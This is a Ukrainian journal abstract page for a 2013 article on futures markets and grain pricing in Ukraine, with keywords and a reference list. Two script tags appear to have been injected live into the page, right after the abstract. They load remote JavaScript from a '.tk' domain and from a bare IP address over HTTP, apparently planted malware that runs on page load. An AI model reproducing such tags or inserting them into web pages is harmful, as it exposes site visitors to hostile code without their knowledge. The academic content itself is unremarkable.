ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 004.087.255.152:65
Ціноутворення та цінова політика

Ф’ючерсний ринок - важливий фактор стабілізації ціноутворення / Солодкий М. О. // Економіка АПК. - 2013. - № 12 - С. 44

Проаналізовано кореляційну залежність ціноутворення на зерно на провідних біржах світу та спотовому ринку країни. Досліджено причини низької ціни на кукурудзу й продовольчу пшеницю на внутрішньому ринку України. Визначено, що у вітчизняній практиці не використовуються ефективні інструменти з управління ціновими ризиками, що зумовлено недосконалістю чинного законодавства, валютного регулювання, нерозвиненістю логістичної та біржової інфраструктури й відсутністю потужного спекулятивного капіталу. Наведено обґрунтовані висновки щодо доцільності прискореної побудови в країні ф’ючерсного біржового ринку та відповідної інфраструктури для запровадження ринкового механізму страхування й управління ціновими ризиками, прозорого ціноутворення, залучення та захисту додаткового операційного капіталу, подання всеохоплюючої інформації для прийняття адекватних управлінських рішень. Табл.: 2. Рис.: 2. Бібліогр.: 8.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: ф’ючерсний ринок, фізичний ринок, ціновий ризик, хеджери, спекулянти, світова кон’юнктура

Список використаних джерел

  1. Solodky M.O., Hnylyak V.A. Commodity Exchange Derivatives: theory, methodology, practice. – Kiev, AgrarMediaGroup, 2012 – 238 p.
  2. Solodky M.O., Stasinevych S.A., Androsovych T.Y., Yaworska V.A. Commodity Exchange Market: problems of functioning and tendencies of innovative development – Kiev, Komprint, 2013. – 215 p.
  3. Solodky M.O., Yaworska V.A. World Derivatives Market: modern situation and tendencies of development. – Agrosvit. – 2013. – №8.
  4. Roslyakov A.A., Ruban Y.V. [Elecronic source]. – http://www.farmer.pl/agroskop/analizy-i-komentarze/ukraina-decyduje-o-cenie-kukurydzy,43550.html.
  5. Irwin, S.H. 'Index Funds, Financialization and Commodity Futures Markets.' Applied Economic Perspectives and Policy 33 (1) 2011: pp. 1-31. (peer-reviewed, published paper).
  6. Sanders, D.R. and S.H. Irwin 'New evidence on the impact of index funds in U.S. grain futures markets.' In: Canadian Journal of Agricultural Economics/Revue canadienne d'agroeconomie, 2011.
  7. Will Acworth. Annual Volume Survey: Trading Falls 15,3% in 2012: www.futuresindustry.com.
  8. Hernandez M. and Torero M. Examining the dynamic relationship between spot and futures prices of agricultural commodities. IFPRI Discussion Paper, 00908, 2010.
Читати статтю: 13_12_44-48.pdf